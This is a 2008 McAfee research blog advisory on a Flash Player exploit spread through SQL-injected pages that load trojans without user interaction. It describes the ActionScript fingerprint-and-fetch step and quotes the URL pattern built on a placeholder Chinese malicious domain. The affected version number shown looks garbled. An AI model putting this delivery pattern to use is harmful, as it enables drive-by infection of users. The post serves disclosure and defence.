McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams
Create Account | Login  | What is TrustedSource?
 
Home  Threats and Trends  McAfee Research Blog
TrustedSource™ Query
Enter IP address, domain name or URL to check reputation/traffic patterns:
Search
 

McAfee Research Blog

Vulnerability in Flash Player actively exploited

May 28th, 2008

A vulnerability in Adobe’s Flash Player is actively being exploited in-the-wild. It may be a zero-day vulnerability. When surfing to websites hosting specially crafted Flash movies, users that become victim of a successful attack are infected by different trojan horses with no user interaction needed. One of the trojans, that disguises itself as a cascading stylesheet with the extension “.css”, is hosted on a chinese server.

The initial infection vector for this seems to be mass SQL Injection attacks. Several domains known to host exploits used in the latest wave of SQL Injection Attacks now additionally point to this new Flash exploit. This exploit comes in handy for the attackers to extend their existing arsenal of digital weaponry in order to reach an even broader list of victims. A search query shows that there are at least 240,000 legitimate pages infected and directing to particular SQL Injection domains - and apart from those that still exist at this moment, new ones pop up all the time.

The malicious Flash movies are crafted to target Internet Explorer as well as Firefox users on the Windows platform. The following screenshot shows different file names for the OBJECT (Internet Explorer) and the EMBED element (Firefox) in the HTML source code.

We spotted several different variants of these specially crafted Flash movies hosted on different domains and carrying different payload URLs. The exploit code is referenced by another movie, whoes decompiled ActionScript code simply fingerprints the installed Flash version in order to craft an URL pointing to the Flash exploit: “http://www.malicious_domain.cn/” + <Flash Version Number> + “name.swf” which is loaded via ActionScript method loadMovie().

As our current findings conducted, valid exploit code is delivered for just one particular version of Adobe Flash Player, namely for Win32 release version 209.0.115.0 - versions newer than that are pointed to a non-existing URL (404 error message). The most up to date version of the Flash Player is reported to not being affected by the vulnerability. Adobe’s Product Security Incident Response Team (PSIRT) has published a blog post stating that the issue is currently being investigated. According to Adobe, it currently is unclear whether this is a new and unpatched vulnerability (”Zero-Day exploit”) or new exploit code for a known and patched vulnerability.

In today’s Web 2.0 world, updating the Operating System in order to be protected from attacks isn’t enough anymore. Alongside strengthened security policies and less critical vulnerabilities appearing in operating systems, widespread third party software - such as Adobe Flash - proved to be the new focus of attackers.

The known exploit Flash movies are detected and blocked as Exploit.SWF.MalScene by the Secure Anti-Malware Engine.


Author: Anti-Malware Team

Back to McAfee Research Blog overview

McAfee Homepage | Contact | Privacy Policy

Copyright © 2007-2009 McAfee, Inc. All Rights Reserved.

ANY INFORMATION PROVIDED BY MCAFEE ON THIS BLOG ARE OFFERED "AS IS" WITH NO EXPRESS OR IMPLIED WARRANTIES, CLAIMS, PROMISES OR GUARANTEES ABOUT THE ACCURACY, COMPLETENESS, OR ADEQUACY OF THE INFORMATION CONTAINED IN OR LINKED TO AND NO RIGHTS ARE CONFERRED. BY USING THIS BLOG, YOU ASSUME ALL RISK FOR YOUR USE. IN NO EVENT WILL MCAFEE BE LIABLE FOR ANY INDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL, EXEMPLARY, OR OTHER DAMAGES WHETHER OR NOT MCAFEE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH LOSS OR DAMAGE. MCAFEE HAS NO OBLIGATION TO POST BLOG SUBMISSIONS OR RESPONSES.